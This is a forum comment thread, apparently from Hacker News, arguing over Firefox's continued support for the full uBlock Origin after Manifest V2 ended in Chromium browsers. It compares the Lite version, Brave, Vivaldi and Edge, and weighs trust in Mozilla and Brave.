It's my primary browser since a few years. If you are talking about sponsored backgrounds, good luck finding any "major" browser that doesn't have something sponsored on it (opt-out).

Let's hear it then because I'm using Brave and don't see the opt-out.

https://support.brave.app/hc/en-us/articles/38305898674957-H...

and simply dont use their homepage as your new tab page


Brave adblocking breaks some websites that uBlock Origin doesn't.

Lately I’ve had better luck with Brave than with FF and UBO, at least one my various banking sites.

Technically Firefox isn't a major browser either.

Firefox is less popular than some of the browsers you listed as not major, so it isn't major either

Well, Edge probably counts. I agree about the others.

Edge is a major browser but is dropping support

I use Vivaldi and I recently installed an update that disabled my v2 extensions. Had to downgrade and disable update checking.

Latest Vivaldi on Linux (8.1.4087.66, Chromium 150). uBlock Origin works.

Opera also claims they are committed to support manifest V2 forever.

....until then when big money starts knocking.

There's a mystery here. People hate ads. Firefox is the only major browser (save Brave?) that properly blocks ads. Yet people don't use Firefox (indeed its popularity is in free-fall).

Why? Is it because they don't know about it? Or they won't go to the trouble of using any browser that isn't the one provided by default by the OS?

I'm not sure. I just don't get it.


It's a damn shame. Using FF on android with a fully fledged uBlock Origin is so good. Makes the web usable. I don't know how people stand browsing with chrome.

I recommend FF whenever the topic of ads comes up and hope that word of mouth with eventually do its thing. Most people don't know about it in my experience.


The pattern I've seen is that people move to a new browser due to speed and bloat. When IE was king, people started moving to Firefox, because it was fast and lean. Over time, it didn't feel so lean anymore, and then Google launched Chrome with TV ads showing how fast it was. Now everyone makes fun of the system resources Chrome requires, but people probably don't see a viable alternative to move to. Firefox is likely seen as old, Safari is only viable on Apple platforms, and everything else is a coat of paint on either Chrome or Firefox. Maybe Ladybird will take users from Chrome when it's ready for general use.

It’s hard for me to imagine that most people care about speed. I think it’s more likely that they just don’t know how bad Chrome is (for the internet) and how evil Google is (it’s still the main search engine for most people). I think Chrome is familiar, and Google is good at locking people in, pretending that Chrome does things better (or even making sure other browsers are handicapped on the Google sites, like YouTube being slower on Firefox).

Back when I first moved off of Firefox the answer was performance. A lot of users mass-migrated to Chrome because it supported a very similar set of extensions and was significantly more stable and performant. People like me evangelized switching to Chrome for everyone. Many copies of Chrome were installed by me.

Now the performance still hasn’t caught up to Chrome but it has improved, and uBlock Origin Lite does a decent job at a baseline level of blocking for most people.


I have used Firefox solely for over a decade. Recently I switched to Chrome to see what I was missing. I was horrified at Chromes memory bloat and the fact it puts tabs to sleep. Trying to click through old tabs was an absolute nightmare as it tried to quickly load back each tabs state and memory, and cpu spikes massively causing whole machine slowdowns, blank white pages, and app freezes.

People say that Firefox doesnt display some pages properly, but I am yet to see one and nobody has ever managed to show me a page that works in Chrome but breaks in Firefox.

Chrome is a glitchy mess compared to Firefox, and Firefox still has Manifest v2 and fully working uBlock. Its a no brainer for me, back to the orange fox I go.


orange.be doesn't work on Firefox. The support will tell you to use Chrome or Edge.

The performance and stability with lots of tabs is actually outstanding.

I use Brave. I want Chromium under the hood.

Firefox on mobile is not good, tried it many times. I also don't trust Firefox Mobile security as much as I trust Brave/Chromium on Android.


Firefox on Android is excellent.

Firefox is also the only "major" browser not installed on any device by default. People with windows use edge, people with mac or ios use safari, people with android use chrome. People with linux use firefox but those are extremely few since none of the machines you buy at the store have linux.

It's really that simple. Marketing realism wins over technical excellence every single time.

Do you know why Valve invested so much into Linux? It's because Microsoft threatened to blacklist Steam from Windows unless they gave Microsoft a 30% cut of all sales. Why would Microsoft do that? Because they can, and it makes money on average (failed this time in particular though). Capitalism is a dog-eat-dog world.


> Microsoft threatened to blacklist Steam from Windows

That would never fly with consumers, Microsoft are big but not that big.


> Marketing realism wins over technical excellence every single time

It is so annoying to see this idiotic mantra being repeated every single time a thread like this pops up. It's simply not true. There is no conspiracy, people aren't being manipulated by Big Tech to like Chromium-based browsers more. Those browsers are simply better and that's it. That's really all there is to it.


"That's the way she goes"

> Or they won't go to the trouble

Some people don't even ask why the thing on the ceiling is beeping.


> Or they won't go to the trouble of using any browser that isn't the one provided by default by the OS?

Chrome isn't the default on Windows or Mac, but it's far more popular than Edge or Safari.


Most people hate ads, but they don't hate them as much as they hate having to learn how to do something for themselves. Therefore, the default almost always wins.

It's a cynical view, but I'm confident that it has a great deal of truth.


You can have my ad blocker when you take it from my cold dead fingers. I will literally move to a shack in the woods rather than go back to late 90s level of bullshit advertising.

I wouldn't need an "ad-blocker" if we just went to 90s level of advertising.

It's not really about advertising as much as it is about "bullshit" nowadays.


> move to a shack in the woods

That's what gemini:// is for.


And Dillo is the equivalent of a shepherds hut in the back garden.

It’s remarkable functional.

I’ve gone weeks using no other browser than Dillo. Usually also disable CSS for most sites.

Built in custom CSS for all sites is also a treat.


It's cozy!

For those who use uBlock Origin Lite, have you noticed any issues/deficiencies in what ads are blocked? I haven't.

I use Firefox with (non-lite) uBlock Origin, and occasionally fire up Chrome (with uBO Lite) for testing. The main issue that I run into is that uBO lite filters can't vary per-domain, so in order to rule out an ad-blocking-false-positive on something I'm developing, I have to turn it off for _all_ sites, not just localhost. (Actual false positives are rare, but needing to check is not so rare.)

That's not true, the on/off toggle is per-site in uBlock Origin Lite.

My experience using uBlock Origin Lite on iOS is that some particularly intrusive ads will figure out a way to load, like local news sites from the US, and many sites will be fully broken (missing entire content portions, content doesn’t scroll, entire page can’t be interacted with). These issues simply don’t occur on uBlock Origin but only exist as an artifact of aggressively blocking elements without applying fixes to unbreak sites.

I have not really had any issues with ads using uBlock Origin Lite. It's like the complainers live in an alternate reality or just listened to some influencer and never actually checked.

I do miss the rules that let me remove stuff based like CSS like selectors. The strange thing is, even though uBlock Origin Lite doesn't support that feature it's still totally possible to make an extension that does that. Maybe the specific thing uBlock Origin was doing is not possible but making an extension that follows rules and hides/deletes elements with different rules per site is still fully possible under manifest v3


But you can do this with uBOL? I’m not sure what you mean. I have multiple rules to hide elements on various sites. With HN I hide elements and can give it a custom CSS dark mode through uBOL. Works on both desktop and iOS.

Haven't noticed any issue, the main limitation is the lack of mobile support on Chrome, but that has always been the case.

I'm so grateful for Firefox on Android


I’ve found uBlock Origin Lite (and every other non-uBlock Origin blocker) to struggle with websites using Ad-Shield. (i.e. the entire website breaks.)

It seems to block most, if not all, ads but I wonder whether it blocks tracking as well as uBO.

In the short time I've used it I haven't noticed any appreciable difference.

I honestly haven't really noticed a difference in ads after switching to the Lite version. It seems to work well enough.


Support Firefox. F** Chrome.

Seriously.

The web is completely unusable without UBO+FF. Any time I have to use a clean browser, I feel assaulted and dirty, plus wonder what malware just got injected into my machine.

If it were to go away, I would probably accelerate retiring to an analog, offline life.


I mean did you try with Chrome and Ublock Original Lite? Because I have and there's literally no difference at all.

It's different under the hood. The crux of the difference is the webRequest API which is only available in Manifest v2. This allows uBlock to strip all tracking data from the requests themselves. So while Chrome w uBlock Lite is hiding almost all the same ads from you, it's not protecting you from tracking

The Lite version also relies solely on filter lists that require you to update the extension itself while the MV2 version can do so dynamically. Additionally, it lacks CNAME Uncloaking which I imagine will become much more commonplace soon enough which will make it impossible to block those ads


There is a lot of difference. Try watching Youtube with uBlock Lite for example.

Fix?

Free Chrome. /s

+1 *

Haven’t tried it but apparently there is an unofficial port of the full version of uBlock Origin to work on manifest v3, the largest challenge being that, on manifest v3, the webRequestBlocking permission is only available to enterprise sideloaded extensions: https://github.com/r58Playz/uBlock-mv3

Great but as soon as Google decides to completely strip the `webRequest` API from the codebase, it's game over. Now that it's deprecated it's only a matter of time. This also means Brave, the last Chromium-based browser to support it, will also be unable to support it

I've been using Firefox for over 6 years now and I've never regretted it.

20 years and counting. :)

Thanks for every day that this browser works.

Sometimes I had to test something in Chrome - and it’s painful experience.

But it really depends on personal view - I have tried to convert my friends and they don’t feel it.


Been using Firefox as my main browser since version 1.5.

The last few years I've noticed that some things have stopped working as smoothly though - mainly just little CSS glitches and things because people don't test in Firefox :(


Sammme. Remember all the hullaballo about the AwesomeBar in Firefox 3?

https://ed.agadak.net/2008/03/beyond-awesome

Truly amazing stuff, in 2008.


I’ve never felt so old as I did reading this comment

I have been using Firefox for 20 years and the regrets kept accumulating till I switched to Chrome 3 years ago.

Username checks out.

Care to share?

Just a reminder to everyone to support weird and new browsers. we'll never get a new crop if we don't water and nurture the alternatives.

I wrote this article about Firefox 0.9 back in 2004, when they first implemented pop-up blocking, and have been using it every day since.

https://www.digital-web.com/articles/firefox_09/


Wow, have you really been maintaining that site for 20+ years now?

Ladybird planned to release alpha this year. Unfortunately extensions are unsupported, but maybe soon: https://github.com/LadybirdBrowser/ladybird/issues/976

I'm a web developer and I have a deep love of Firefox. I've been on it since version 3 and I'll be with it to the bitter end. I love that uBlock Origin is still available and while the news of Firefox's declining market share can be quite concerning, I hope it will be around for a long time.

Manifest 3 is why I finally shut down Sitetruth and Ad Limiter. Removing ads from Google Search is now possible only in Firefox.

uBO still works in newest Vivaldi.

? I use Chrome and uBlock Origin lite. There are no ads on google search

But does it also block tracking? (Hint: No, it doesn't)

Remember when Firefox was the first browser to have "tabbed browsing"?

Obviously UBO isn't a first party feature - but if only Firefox could generate as much traction about ad blocking as they did with tabs.


I'm fairly sure Opera introduced it first.

Yes, well, kind of. Opera had Multiple Document Interface (MDI) which was actually (back then) far more flexible than tabs. But yes, Opera was first with MDI, and also I suppose the first web browser for the smartphone.

Yes. Opera (original, not what is called Opera now) introduced tabs first. I believe in the 5.0 version with presto engine.

No, because Opera and SimulBrowse had it years before Firefox even existed

Yeah, I remember.

I also remember it automatically blocking popup ads. That was a huge deal.


Firefox is also the only browser that supports anything like userChrome.css for customizing tabs, toolbar, address bar, menus, spacing, etc.

Does it really make a huge difference to keep supporting Manifest Version 2?

I've installed uBlock Origin Lite in my Edge browser and I don't see any ads there either.


Yes, huge difference

- MV2 version has sophisticated scripts to not only block ads but prevent tracking. With the lite version you might not be seeing most ads but you are certainly being tracked more

- MV3 version might "hide" ads but the MV2 version is blocking requests from every being made. All those stats you hear about improved battery and reduced bandwidth usage with an adblocker are only true for the MV2 version

- CNAME uncloaking is only done with MV2 version. That means when advertisers on sites cloak their CNAME, you won't be able to block them

- filters lists on Lite can only be updated when you install an update. In MV2 version it updates the lists dynamically. Advertisers change their domains all the time


Like I've said in earlier posts: tracking cannot be solved through technological means. It has to be solved through legislation.

The only thing you get is an arms race which Big Tech will always win because they have infinite budgets to keep the music playing.


lol

Imagine believing the only way to change the world is voting and politics


YES!!

Then why haven't I see any difference in ad blocking with uBlock Origin Lite on Edge?

The biggest difference is it doesn't block tracking.

I just started using Zen (Firefox-based Arc clone) after Arc updated to Manifest V3. It's great! Last time I installed zen it was a battery hog, but it's much better now.

I was shaking my head when my fellow developers, and some hackers, moved from Firefox to mostly Chrome. “It has better dev tools you see”, “it’s so much faster you see”, and a boatload of other excuses.

But what about the remonopolization of the web? I remember how much it SUCKED when internet explorer had 95% of the web thanks to Microsoft’s illegal practices. I saw the same behaviour from Google, the ad company and they haven’t event gotten a slap on the wrist. Fuck, people fucking loves Google, despite their turn to the dark side.

Well here we are, with the open web almost dead. It’s time to revive it. Start using alternatives again. Seek out and support people and organisations that are actively working to build the community web, not this corporate shit it’s morphed into.

End rant


Yep. Chrome is the new IE. Zero difference. And Chrome was created to break the grip that IE had.

Chrome became popular in the time where firefox was already more popular than IE.

The big difference is that it's still updated.

I feel that the web via browser is in danger. Vast majority of people can be convinced to switch to walled garden apps just like vast majority are fine with tablets, phones aka non open locked down computers. I am a Firefox/ublock user, and prefer browser to mobile apps, however I see the writing on the wall

The Web might be better off if those offenders aren't part of the web anymore.

Chromium still has MV2 support in the extension loader as of the current state of the Chromium repository at https://chromium.googlesource.com/.

This means that both Microsoft and Google have elected to disable support at build time and alternative, good, Chromium based browser like Helium (https://helium.computer) still support it. As a matter of fact Helium still uses it to fetch and run uBlock Origin out of the box for mitigation against trackers, malware and ads.


Thank God for the Brave browser. For those disliking their built-in adblocker, there is a Manifest v2 opt-out specifically for uBlock if you need it.

It's on a time limit. Chromium deprecated MV2 but still keeps the webRequest API in the codebase. Google could at any time decide to strip it entirely. Or it could just stop working due to lack of maintenance as Chromium grows.

Brave is relying on a fork that takes advantage of the fact that the webRequest API is still technically there


That's why Brave probably built an in-built adblocker written in Rust. Works great on both desktop and mobile.

Brave's adblocker looks pretty good but it's not nearly as customizable or granular as uBlock Origin is. I don't use Brave but I think it'd be nice to be able to choose from a variety of adblockers instead of being forced to rely on the "official" one because of the MV2 stuff

Peter Theil was an angel investor in Brave. That alone is all the reason privacy-minded users need to avoid it.

Wasn't Brave also founded on the back of a bunch of Web3 nonsense? That's always what kept me away. I'm actually surprised how many fans it has.

There was something else they did that was shocking a couple years ago that made me glad I never used it. I went to wikipedia to jog my memory and found this...

> In 2020, the company was found to be appending affiliate referral codes to the end of certain cryptocurrency exchange URLs typed into the browser's address bar. The practice applied to exchanges such as Binance and Coinbase, and was later discovered to extend to suggested search queries for terms like "bitcoin" and "ethereum".

I'm not sure why anyone would trust a browser that does this kind of thing. Some could claim it's a harmless way to make some extra cash, but it's very similar to what Honey was caught doing.


As someone who lives in a country bordering russia, I will certainly switch to Brave now.

Because Peter Thiel gave them some money, there's some secret backdoor code that's sending all your information to Palantir?

Sometimes you make decisions based on principle and future risk. Brave Software is a for-profit company that funded its start through Peter Thiel.

Even if fine in the present, you cannot guarantee me the future of a Thiel-funded, VC-owned firm.

Mozilla, in comparison, is a mature, non-profit with substantial goodwill and operational transparency.

Everything past these details are just noise.


It's quite likely that Brave itself collects data on your usage and shares at least some of it with Palantir.

This isn't such an outrageous assumption to make here.


There's no need to make assumptions. The source code is out there. Please, show us the relevant commits which do what you said.


I mean sure, but there's a bit of a difference between "sells data to no one really knows who" and "sells data to no one really knows who AND PALANTIR" which the original commenter seem to be flagging as a problem.

"no one really knows who" is probably also Palantir or someone who resells to Palantir.

From what I know personally, Firefox truly is responsible with user data. Though -- to steel man your point -- all the data Firefox sells is through their subsidiary Anonym, which goes through great lengths to anonymize all user data that can't be tied to any individual.

Example: selling market preferences of a town rather than the individual people in it.


Well Thiel investing in Brave once at the beginning doesn't necessarily mean that Palantir is getting any data now (even though it's presented as if it was a fact in other comments here). It's probable, but really it's just speculation, just like anyone can speculate about who's getting data from Firefox.

But at least with Brave, the initial funding information was made public, so there's already more information available to users in comparison with Mozilla. Mozilla just said: "there are a number of places where we collect and share some data with our partners" - that could mean literally anyone.


Telemetry can be disabled in Brave. Any kind of history/bookmark syncing is opt-in.

You're just spreading FUD unless you have evidence that Brave funnels usage data in secret.


That is their MO

Why use Brave rather than FF? Sincere question. Lots of tech minded people choose it, when FF seems like an ideal choice?

My reasoning for not using Brave: not only is it a wrapper around Chromium, but their crypto stuff and some dodgy affiliate injection in the past paints them as untrustworthy.


It's certainly better than stock Chrome but Firefox becoming relevant again is still the ideal option.

I think it's necessary for the future of the web. Ever since Opera gave up on Presto and Edge gave up on Trident, we've seen a massive and sudden consolidation towards Chromium. It's sad how quickly we forgot the lessons we learned from the days of IE's dominance

Sad indeed. What trully pisses me off though is the fact Mozilla has like hundreds of millions of dollars in the bank, possibly a billion dollars, and yet they continue to neglect Firefox.

I don't know why people say this. They've consistently improved firefox and done phenomenally on all of the WPT inter-ops for 5 years running

https://wpt.fyi/interop-2025

https://wpt.fyi/interop-2024

https://wpt.fyi/interop-2023

https://wpt.fyi/interop-2022

https://wpt.fyi/interop-2021

This doesn't look like neglect to me at all. And in addition to all this, they've dramatically reduced their dependency on Google for funding.


It's good but I find they EOL devices/OS's earlier than Firefox.

Brave is great. Works across windows/mac/ios/android/linux.

Isn’t Brave just another Chromium variant?

Chromium is detestable. In whatever form it takes.


What’s detestable is Firefox’s lack of security and Mozilla’s priorities surrounding it compared to Chromium

https://www.reddit.com/r/GrapheneOS/comments/1unhtxu/initial...


Brave is malware, I don't understand how anyone on HN can use it, baffles me every time.

They've literally been caught MITMing web pages for their own financial gains.


In that case Firefox is also out. They have been caught auto installing random hidden extensions with full read/write access to all websites and blocking uBlock Origin from working on, for example, the Firefox extension site.

> have been caught auto installing random hidden extensions with full read/write access to all websites

Lol, they chose to ship parts of their browser as extensions, it's definitely now "random extensions".

> and blocking uBlock Origin from working on, for example, the Firefox extension site

Any other example? Bypassing an extension on their own website has absolutely no link to the browser itself being a malware, this is ridiculous.

I don't even use Firefox and I think Mozilla is a shit organization misusing its funds to pursue bad ventures lately, but even I think your claims are bullshit.


> But Firefox is one of the few web browsers remaining that isn’t based on Chromium, and it’s now the only major browser to still support uBlock Origin. Neither Safari nor DuckDuckGo—the two other major non-Chromium browsers out there—support uBlock Origin

Does anyone here use DuckDuckGo browser? I've honestly never heard of anyone using it, so I'm pretty surprised to see it categorized as a "major browser". I already basically think of Firefox users (which includes myself) as a pretty tiny minority, so I'm not sure how much smaller you can really get while still being "major".


I use DDG on Android and it works pretty well there. I also saw this line in the article and it's somewhat of a stretch to call DDG either a "major" browser (as you point out) or a "non-Chromium browser". My understanding is it uses the browser engine bundled with the OS on Android/iOS/Mac/Windows and it isn't available for Linux.

The wikipedia article on it says:

> The core browser functionality is the WebView component provided by the operating system. This means the browser engine is Blink on Android and Windows, and WebKit on iOS and macOS.


Interesting, thanks for the context! I hadn't realized it was mobile-only, which is probably part of why I hadn't realized it existed. And yeah, it does seem like they maybe didn't know what they were talking about if the engine is literally Blink.

Qutebrowser seems to _want_ uBlock Origin-style filtering, but development on the feature has been ongoing for a long time and seems to have somewhat stalled: https://github.com/qutebrowser/qutebrowser/pull/7629

It is worth mentioning that there are other options like NextDNS and similar, which complement uBO(L) nicely.

I just use Brave. I haven't seen a YouTube ad in years.

There are ads on YouTube?

I got a Android tablet...I can't recommend it. YT has gotten pretty toxic with the dark patterns. There are the usual interstitial ads, but after you skip and go full screen there's another ad widget in the lower left of the video. You have carefully navigate a popup menu to dismiss it without triggering an ad popup. If you pause or double-tap to -10s the video it restores down and shows an ad on the right side.

The Edge browser for has the best ad-free experience I've found so far on Android. It supports Widevine (DRM videos) and performance is good enough for most videos. I do get an occasional stutter with higher res videos. Firefox supports Widevine, but it didn't last week? Or I just didn't get the popup to "Enable DRM" for some reason. Edge claims to have blocked 15k YT ads in the last week with the built-in AdBlock Plus. It works with uBlock Origin as well (this week anyway).


NewPipe is a YT frontend that blocks ads, allows downloading, can run in the background and is generally great. It's a killer app for Android in my opinion.

https://github.com/TeamNewPipe/NewPipe


Second recommendation for newpipe. Fantastic app. I love that you can still have "subscriptions", playlists etc without an account. Set it as the default app for youtube.com and related domains and you'll never look back

Firefox works fine on Android, and supports ublock origin and playing youtube in a background tab/with screen off. Couldn't speak to DRM as I've never used it on any platform.

On Android you can still patch the YouTube apk with Revanced and get rid of ads (and you can enable sponsorblock, etc).

Oh yes they are. Occassionally when I am on a device which doesn't have an ad-blocker. I witness it and I am always left feeling shocked at how many ads Youtube can have. We really don't know the plight of so so many Youtube users. I feel sympathy for them and want to hug them and install an ad-blocker for them.

I actually used to install Revanced for all the relatives who ever complained about Youtube and some who didn't even ask! I just feel like Ad blocker is such a useful thing that I can do to people that I care about who don't know deeply about it.

I must say that it is one of the top entries of lists of most useful/time-saving things I have done in actually saving anybody's actual time.

I express gratitude towards the universe for Ublock Origin. Words can't comprehend how much I love it.


Last time i tried to skim through a longer video on non ad blocked youtube i got two ads every time i skipped. Ended up watching more ad than video... at least until half way through it when I gave up.

And even if you watch one without skipping I'm not sure the amount of ads is even legal in my jurisdiction.

Pay for Youtube premium you say? But I only use it like once per month anyway. Easier to just not try.


But you see crypto ads in the browser's own settings.

Nope. I made the one-time payment for Brave Origin.

Meanwhile, Firefox derivatives are completely free with no ads and don't support the crypto grifts industry or removing rights from gay people.

No-one referenced Firefox also has Brave's adblocking implementation baked in, even if disabled for now.

Additionally, I eagerly await resource (CPU+site size) buckets to be implemented on a browser and a LocalCDN along it to shrink the web.


It looks like Google constantly pushing "MV3 is more secure" messaging worked at the intended high level.

Now they are doing it to Android with mandatory developer identity verification and Play Integrity. I wonder how those engineers sleep at night.

Can't I get the same thing with Brave though? I'm getting what feels like built in ad blocking.

I don't know why with LLMs we can't just add MV2/blocking web request support to Chromium in a fork.

The argument against was always that it's "too hard to keep a fork in sync". Now it's easier.


That's basically exactly what Brave (the only Chromium browser still supporting uBO) is doing to support uBlock Origin. But it's flimsy and likely has an expiration date.

AFAIK they are using the built-in support which Google still maintains even if they don't expose it.

My point is that when MV3 was announced there was an assumption that maintaining a Chromium fork to continue supporting MV2 would be too much work and too expensive. But now with LLMs that's no longer a safe assumption. The non-Chrome chromium based browsers can fork chromium and add back MV2. No need for any expiration date.


It's not because of LLMs. It's because Google only stripped MV2 support but didn't strip the webRequest API that is at the center of this whole thing. It's pretty simple to maintain a fork that just supports the MV2 standard if the APIs are still there. If Google ever decides to finally remove the API, it would certainly be a much larger challenge

Or you could just use Firefox.

The only reason that Google keep Firefox around is because they find it beneficial for antitrust reasons.

We should prepare for a future without Firefox, because one day it won't be there anymore.


by supporting google?

And we must protect it at all costs.

I love Firefox.

We need more browsers like Firefox - more open source, more open to standards that improve the web, that can improve our browsing experience.


I agree. The death of Edge's Trident and Opera's Presto has been really scary for the web. I know it's really far off but I truly hope Ladybird, Servo, and Flow succeed in building mature and competitive web engines

Then make one.

I fear that more and more sites increasingly serve different experiences based on things such as the presence of Adblock etc.

Not my experience at all. Ever since Google neutered ABP with this move, it feels like everyone else just gave up the arms race. Which makes sense give how little market share FF now has.

What is the definition of major?

Globally, Firefox has ~2.2%.

On desktop alone that's still only 6.4%.

Where is the threshold?


Great, this is unique trait and helpful one - Firefox is here to stay

Ads are so invasive and prevalent now that you need an ad blocker just to use the internet.

Yet 90% of people don’t use a browser capable of running ubo

Because all those other browsers can still block ads. I use ubo lite for safari and it's largely fine.

It will be "largely fine" until the ad networks start using the methods not blocked by the Lite version. You may not even notice that they start tracking you efficiently. See https://github.com/gorhill/uBlock/wiki/uBlock-Origin-works-b... for some examples of things Ublock Lite can't do.

Related discussion:

uBlock Origin Lite now available for Safari (apps.apple.com)

1156 points by Jiahang on Aug 5, 2025 | 451 comments

https://news.ycombinator.com/item?id=44795825


Now? Sure seems like it's been that way for well over a decade.

It is possible to write your own extension and still use it in Chrome as long as it's not bundled. It would be a huge pain to get the source for uBlock origin and implement it locally yourself, but it might be worth the pain to block ads.

The original uBO relies on Manifest V2, the API Chrome no longer supports. It's impossible to run full UBO (not Lite MV3 version) on current versions on Chrome.

>It's impossible to run full UBO (not Lite MV3 version) on current versions on Chrome.

Current version of Chrome seems to be 152.0.7977.39 released August 14, 2026.

August 14, 2026 Chromium 152.0.7977.38 based vivaldis napshot https://vivaldi.com/blog/desktop/address-field-calculator-an... has this in patch notes:

"[Extensions] Re-enable and extend Manifest V2 extension support for the time being (VB-130324)"


Yeah, Vivaldi specifically is keeping MV2 alive for uBO it seems. We'll see how long they can maintain it with their small team.

Are there any Chromium-based mod/plugin loaders out there? I mean something that uses the same DLL/SO hijacking or injection tricks game hackers use to build mod loaders, to expose a hooking layer for plugins.

Brave has the same style of engine built into the browser.

Related:

Microsoft Edge is about to lock out older ad blockers, just like Chrome did

https://news.ycombinator.com/item?id=49220392


Edge is just chromium under the hood. So not a surprise there, should be easy lift for them.

Firefox is now the only major browser, because it supports uBlock Origin.

Honestly whenever I need to use a browser without AdBlock at work I'm baffled that anybody can use this for regular day-to-day use.

It's borderline impossible to read some webpages.

Just one more reason to stay on FF I guess.

Especially since they launched extensions on mobile FF has been so much better than any of the alternatives I don't see myself going back anywhere else.


Sounds great, but doesn't this come at a price of maintaing the whole of MV2 support which is inherently insecure? If yes, then it's not a great look.


Monocultures suck.

The title misses something more important: Firefox is and has been for a very long time the only browser who wasn't made by people trying to extract profit from you.

Everything follows from this. Edge people, Chrome people have been living in a fairytale for believing that the keepers of their portal to the web were offering a product as complex and expensive as a browser without asking for anything in return.

Anyone knows that any company that gives you something for free will eventually want something from you. You accepted a free browser from a for-profit entity and paid nothing. Now, Faust has come to collect your soul.


> Anyone knows that any company that gives you something for free will eventually want something from you

Firefox is also free.


uBO + Steven Black hosts list + firefox. Peace, for now at least.

Firefox, after 20 years, once again has an advantage over the other browsers.

Let's hope for new generations to get tired of so many ads to finally ditch chrome.


Unfortunately, new generations seem to be completely fine with this. People in general, they're just so completely captured by the dark patterns that I get the impression they cannot even imagine a world without them.

I install uBlock Origin on every browser I come across. Everybody notices. The internet just feels better, somehow. People can't quite explain what changed, but they know.


And now you'll no longer be able to wake people up and show them the real world.

It's funny. Over 20 years ago, I got people to switch to Firefox because of the AdBlock extension.

In case people don't know, Firefox was the first major browser to even have extensions.


Also, Firebug showed what was possible with developer tools. Inspecting elements or network requests or whatever else wasn't really a thing before that extension.

There is only XUL!

Long dead. Now there is no XUL, only (private user) data (that Mozilla sells for revenue)

I think they're making a Ghostbusters joke, btw

Mozilla made the joke themselves, about Firefox. "There is no data, there is only XUL" was an official XUL catchphrase. But now there is no XUL, and Mozilla sells private user data, so it's reversed.

I wonder if new generations will just get better and better at visually blocking off ads when they read. So many layouts are so common that I read a lot of sites and have absolutely no idea what ads they're running because 30-odd years of browsing rendered HTML pages has trained my brain to block off and not process certain areas of the page.

I'm not an advertising apologist, just pointing out that I can remember what ads were on a freemium TV station I watched two nights ago and what ads were on a radio station I listened to this afternoon but I can't remember a single web ad since...I don't know when. This might be because the TV ads have audio and visual, and with radio my alternative at the moment was looking out the window of my car, but web ads just seem very easy to mentally filter.


New generations don't 'browse' web anymore. They 'consume' YouTube, Instagram, Android TV and other walled gardens. These generation don't even know they could change contents being displayed on their device to their wish. For them it's just whatever the app shows. They don't understand Web, extensions, DNS etc. I don't have hope for new generations. We're are the old men now yelling at AI and App Stores.

uBlock Origin Lite works decently on Chrome so I doubt this will help migration to Firefox.

It doesn't block tracking.

Exactly. The difference between the two is not qualitatively different for 99% of users.

I noticed that UBO Lite doesn't cause the ad boxes to vanish like UBO does. You see this on the likes of the weather.com webpage.

Exactly. The Lite version is basically "hiding" ads rather than blocking. The MV2 version stops the requests themselves from being made which save your bandwidth and battery. The light version lacks those benefits

Advertisers get to pretend their ads are being seen.

Websites get paid.

Users don't see ads.

Sounds like a win-win-win?


Users are still being tracked and your websites are still slower to load. More of your bandwidth and CPU is being used.

If you want a sophisticated version of what you think this is, see Ad Nauseum. It's uBlock Origin except they create a fake "profile" for you and selectively click ads under the hood to throw advertisers off


That's manifest V3 working as intended.

If only they focused on making Firefox the definitive good browser instead of a platform for their AI efforts.

Firefox will never convince people to leave chrome on philosophy alone. I detest Chrome with a passion and refuse to touch it with a ten-foot pole, but cannot in good faith recommend Firefox to anyone in today’s world. “It kinda works” is about as far a compliment you can give it.


"It kinda works" is factually incorrect.

I have used Firefox exclusively every day on macOS for the past year, several hours a day, and have not one single time had to open another browser. None of the customers of my B2B saas use Firefox. Not once have I needed to test in their browsers except quick smoke testing to prove to myself that the rendering and details are identical. All my other browsing is indistinguishable from before when I used Chrome, and from on mobile where I (tragically) am forced by Apple's monopoly to use Safari.

Do you have evidence to support your false claim?


Just take a look at some other people kinda trying to refute me but confirming my point that there’s an increasingly frustrating wave of websites and features that simply refuse to work on Firefox (or Firefox+Linux).

I know when you’re balls deep in your own little box it’s hard to see the cracks in the foundation. But they’re very much there.


> Just take a look at

> some other people

"Look around, it's everywhere" isn't evidence, it's misdirection.

I will not be made to go find evidence of your false claim. That's on you.


Agreed, I can't understand where these experiences come from.

I only ever use Firefox, at work, at home, mobile. Since forever, as long as there has been a Firefox (and Mozilla before that, Netscape prior).

There was one time about 8-10 years ago that I encountered a site that didn't work in Firefox, was some weird proprietary training module at work.

So yes, I did encounter one site that didn't work in Firefox in the last ~20 years. One.


I genuinely wouldn't be surprised if it was Google astroturfing every single thread relating to FF. Yes, Mozilla isn't perfect and had some questionable decisions, but we're somehow okay with the worse option out of the two? Somehow, Mozilla's decisions are enough to never use FF, but Google's infinitely many horrible ones are acceptable for.... What reason?

> Somehow, Mozilla's decisions are enough to never use FF, but Google's infinitely many horrible ones are acceptable for.... What reason?

I think these people are real and predate AI. I think it comes down to a fundamental psychology in how the two browsers are marketed online. Firefox users would say "Firefox is better than Chrome." Chrome users would say "Chrome is good." Firefox is touted as a better browser on the principle of the freedom it gives its users, and paradoxically, that draws heavy scrutiny.

I don't think I am doing a Goomba fallacy here. People that claim to care about privacy and browser freedom will express disgust with Mozilla then, in the same breath, say they are opting into Chrome out of spite, which is 100x worse.


> say they are opting into Chrome out of spite, which is 100x worse.

That is what is frustrating, indeed.

Firefox is not perfect. Nothing is perfect. There have been changes in Firefox over the years that I don't like. (I'm still hurting from it moving the tabs to the top, so annoying.)

In a scale of 1 (100% user-hostile) to 10 (absolutely perfect user-centered browser), Firefox only scores a, let's say, eight.

But chrome scores a solid 2, so obviously I'm not going to use it, ever, no matter if Firefox makes the occasional mis-step.


I concur that it is strange seeing the FF/Mozilla vs chrome arguments. Its almost as if some large percentage of users here relied on web ads for their income.

Weird!


What do you think doesn’t work on Firefox? Aside from Google products purposely crippled, everything works just fine in my experience. It’s fast and stable. If there’s a bunch of AI stuff in it, I’ve not seen it. Of course I believe it exists, I just don’t ever read popups anyways. To be fair, I probably use 5% of the browser’s capability (I imagine many are like me). I browse websites and I have UBO installed.

In the last few months, I've seen a huge upsurge of sites that simply won't work for me in Firefox.

Not sure if it's the FF + Linux combination. Should probably try with a fresh profile to confirm.

It sucks, but I'm in on FF all the way. If much of the web stops working for me, it just means I have more time on my hands!


Anecdotally my own experience is consistent with this with the same platform+browser combination.

It appears that there are now significant numbers of sites - or at least noticeable parts or features of sites - that rely on Google-specific APIs and haven't been tested on other browsers.

However visiting those sites from Apple devices is often similarly frustrating. I'm not sure this is an anti-Firefox thing. It seems more of a not realising there are other browsers apart from Chromium-based ones thing.


